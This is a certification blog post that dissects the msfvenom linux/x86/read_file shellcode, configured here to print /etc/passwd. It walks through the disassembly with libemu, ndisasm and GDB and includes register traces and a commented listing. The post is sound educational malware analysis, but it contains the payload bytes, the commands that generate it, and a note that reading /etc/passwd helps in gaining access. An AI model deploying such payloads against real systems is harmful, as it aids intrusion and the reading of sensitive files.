This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134
Assignment number: 5.2
Github repo: https://github.com/kkirsche/SLAE
Introduction
Hey everyone! Today, we’re going to keep moving forward with our shellcode analysis work. Like last time, instead of writing our own assembly code, we’re instead going to analyze the work of someone else.
Requirements
- Take at least 3 shellcode samples created using msfvenom for x86 Linux
- Use GDB, ndisasm, and/or libemu to dissect the functionality of the shellcode
- Present your analysis
As we said before, first off, this isn’t going to be the complete assignment 5, instead, this is going to discuss the second of the three shellcode samples generated using msfvenom for x86 Linux. I’ll be creating another article to discuss the final payload. With that in mind though, we can definitely meet the other two goals.
Our shellcode
So to get started, I had to choose what shellcode I was going to analyze. After looking through msfvenom’s payloads, I found one which seemed like it’d be interesting — the linux/x86/read_file payload by hal.
I think this one will be interesting to review as I wanted to focus on topics which we didn’t explicitly cover in the SLAE course, such as reading file contents using NASM.
If we take a look at what options we have, we see there are a fair number of them:
Looking at these, we do have a number of advanced options which we won’t be working with. Instead, we’ll focus on FD (the file descriptor to write to) and the path (path of the file which we’ll dump the contents of).
In our case, we’ll stick to FD 1 (stdout) for our file descriptor. This will simplify the setup required to analyze the shellcode. We do need to set the path though. We’ll dump /etc/passwd, as that’s often a good starting point when we are trying to get access to a machine.
Let’s dig into our shellcode though!
Libemu
We’ll start off by analyzing the payload in libemu, which provides the sctest binary for analyzing what a payload does. We’re not going to cover the options, as we previously did in the first shellcode analysis document. But the basics of it is that we’re enabling verbose mode, reading the payload to analyze from stdin, and iterating through up to 10000 steps. If we’re lucky, this will give us pseudocode to start our analysis with.
msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000
Sadly, like last time, we don’t get any pseudocode. If we take a look at the execution graph, hopefully we’ll get a bit more. Realistically, I expect we’ll need to drop into ndisasm and walk through the assembly at a lower level to really analyze this.
msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | sctest -vvv -Ss 10000 -G read_file.dot && dot read_file.dot -T png > read_file.png
Sadly, this gives us an empty image. We need to drop directly into the raw assembly language instructions instead.
ndisasm
~ $ msfvenom -e generic/none -a x86 --platform linux -p linux/x86/read_file PATH=/etc/passwd | ndisasm -u -
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 73 (iteration=0)
generic/none chosen with final size 73
Payload size: 73 bytes
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
0000003E 657463 gs jz 0xa4
00000041 2F das
00000042 7061 jo 0xa5
00000044 7373 jnc 0xb9
00000046 7764 ja 0xac
00000048 00 db 0x00
There we go, with a reasonably solid background in assembly, that should be easier for us to understand.
First function
Unlike the shell_find_tag payload we worked with in our last analysis, this one works a bit differently. We don’t just immediately begin our first function. Let’s dig into what we mean by looking at a subset of the instructions:
00000000 EB36 jmp short 0x38
00000002 B805000000 mov eax,0x5
00000007 5B pop ebx
00000008 31C9 xor ecx,ecx
0000000A CD80 int 0x80
...
00000038 E8C5FFFFFF call 0x2
0000003D 2F das
...
If you’ve done much shellcoding before, you should recognize this JMP, CALL, POP sequence which we use to retrieve where an item (like the path to our file) is located in memory without relying on hard coded values.
First, we take a short jump from 00000000 to 00000038, we then call 0x2 which brings us up to the mov eax, 0x5 instruction and pushes 0000003D onto the stack. We can see this in GDB:
You can see here both the assembly before we execute the call. We then use stepi to step into the function, and push the next instruction onto the stack as our return address. We then examine this, and verify that this is in fact what happened. We have our das instruction on the stack for our return.
Now that we have this on the stack and we’re back at 00000002, we then move 0x5 into eax. This is setting up our first function, SYS_OPEN.
int open(const char *pathname, int flags);
We then pop the return address into EBX, giving us a pointer to our PATH variable from msfvenom in EBX.
We then XOR ECX so that it’s 0x0 which is the value of the O_RDONLY flag. We then trigger an interrupt so that we call our function.
This leaves our registers look like so after each instruction:
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
You’ll notice how after we trigger the interrupt, our value in EAX changed from 0x5 to 0x3, which is the return value of our call to open. We can read the open manpage for more information about the return value:
The return value of open() is a file descriptor, a small, nonnegative
integer that is used in subsequent system calls (read(2), write(2),
lseek(2), fcntl(2), etc.) to refer to the open file. The file
descriptor returned by a successful call will be the lowest-numbered
file descriptor not currently open for the process.
So we successfully called open! This is a good start.
Second Function
Now that we have our file descriptor, we can start the second function:
0000000C 89C3 mov ebx,eax
0000000E B803000000 mov eax,0x3
00000013 89E7 mov edi,esp
00000015 89F9 mov ecx,edi
00000017 BA00100000 mov edx,0x1000
0000001C CD80 int 0x80
We first move the opened file descriptor value from EAX into EBX, as it’ll be a function argument for the second function. We then move 0x3 into EAX for our function. 0x3 is the value representing the SYS_READ system call.
ssize_t read(int fd, void *buf, size_t count);
So we already have int fd covered by putting the file descriptor in EBX. We then move the address ESP is pointing to into EDI and subsequently move it into ECX giving us a pointer to our buffer. And finally we move 0x1000 into EDX as our size_t value and trigger our interrupt.
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000C | mov ebx,eax | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
0000000E | mov eax,0x3 | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
00000013 | mov edi,esp | 0x3 | 0x3 | 0x0 | Unknown | 0xffffd190 |
00000015 | mov ecx,edi | 0x3 | 0x3 | 0xffffd190 | Unknown | 0xffffd190 |
00000017 | mov edx,0x1000 | 0x3 | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001C | int 0x80 | 0xd3a | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
With our function called, we see that EAX holds a non-zero value. In this case, it’s the number of bytes which were read. In our case, 3386 decimal or 0xd3a hex.
Third Function
0000001E 89C2 mov edx,eax
00000020 B804000000 mov eax,0x4
00000025 BB01000000 mov ebx,0x1
0000002A CD80 int 0x80
This one is nice and short. We move the length of the file we read into EDX, move 0x4 (sys_write system call) into EAX, and then 0x1 into EBX which is the FD variable we passed to msfvenom. In our case, that’s stdout. We then trigger the write function to write to stdout.
Address | Instruction | EAX | EBX | ECX | EDX | EDI |
00000002 | mov eax,0x5 | 0x5 | Unknown | Unknown | Unknown | Unknown |
00000007 | pop ebx | 0x5 | 0x8048091 | Unknown | Unknown | Unknown |
00000008 | xor ecx,ecx | 0x5 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000A | int 0x80 | 0x3 | 0x8048091 | 0x0 | Unknown | Unknown |
0000000C | mov ebx,eax | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
0000000E | mov eax,0x3 | 0x3 | 0x3 | 0x0 | Unknown | Unknown |
00000013 | mov edi,esp | 0x3 | 0x3 | 0x0 | Unknown | 0xffffd190 |
00000015 | mov ecx,edi | 0x3 | 0x3 | 0xffffd190 | Unknown | 0xffffd190 |
00000017 | mov edx,0x1000 | 0x3 | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001C | int 0x80 | 0xd3a | 0x3 | 0xffffd190 | 0x1000 | 0xffffd190 |
0000001E | mov edx,eax | 0xd3a | 0x3 | 0xffffd190 | 0xd3a | 0xffffd190 |
00000020 | mov eax,0x4 | 0x4 | 0x3 | 0xffffd190 | 0xd3a | 0xffffd190 |
00000025 | mov ebx,0x1 | 0x4 | 0x1 | 0xffffd190 | 0xd3a | 0xffffd190 |
0000002A | int 0x80 | 0xd3a | 0x1 | 0xffffd190 | 0xd3a | 0xffffd190 |
This returns into EAX the number of bytes that were written out to the file descriptor, which in our case is the full file.
Final Function
0000002C B801000000 mov eax,0x1
00000031 BB00000000 mov ebx,0x0
00000036 CD80 int 0x80
This is nice and simple, 0x1 is SYS_EXIT. 0x0 is our exit code, and then we exit cleanly.
Commented ASM Code
With a solid understanding of how this worked, let’s comment our assembly code accordingly:
00000000 EB36 jmp short 0x38 ; jump to 0x38 so that we get the address of our file path
00000002 B805000000 mov eax,0x5 ; SYS_OPEN system call
00000007 5B pop ebx ; file path into EBX
00000008 31C9 xor ecx,ecx ; O_RDONLY flag for SYS_OPEN command
0000000A CD80 int 0x80 ; execute SYS_OPEN function
0000000C 89C3 mov ebx,eax ; move the file descriptor which we've opened into EBX.
0000000E B803000000 mov eax,0x3 ; SYS_READ system call
00000013 89E7 mov edi,esp ; Move a pointer to our buffer into EDI.
00000015 89F9 mov ecx,edi ; Move the pointer into ECX for the buffer argument
00000017 BA00100000 mov edx,0x1000 ; define the size of our buffer
0000001C CD80 int 0x80 ; execute the READ call
0000001E 89C2 mov edx,eax ; Move the size of the file we read into EDX
00000020 B804000000 mov eax,0x4 ; SYS_WRITE system call
00000025 BB01000000 mov ebx,0x1 ; Move the FD msfvenom variable into EBX (where we will write the file to)
0000002A CD80 int 0x80 ; Write the contents out (this is where we see the contents!)
0000002C B801000000 mov eax,0x1 ; SYS_EXIT system call
00000031 BB00000000 mov ebx,0x0 ; 0 return value
00000036 CD80 int 0x80 ; exit cleanly
00000038 E8C5FFFFFF call 0x2 ; Call 0x2 so that we push the location of /etc/passwd onto the stack.
0000003D 2F das ; /
0000003E 657463 gs jz 0xa4 ; etc
00000041 2F das ; /
00000042 7061 jo 0xa5 ; pa
00000044 7373 jnc 0xb9 ; ss
00000046 7764 ja 0xac ; wd
00000048 00 db 0x00 ; null string terminator
And with this, we now understand how this payload works! This is awesome.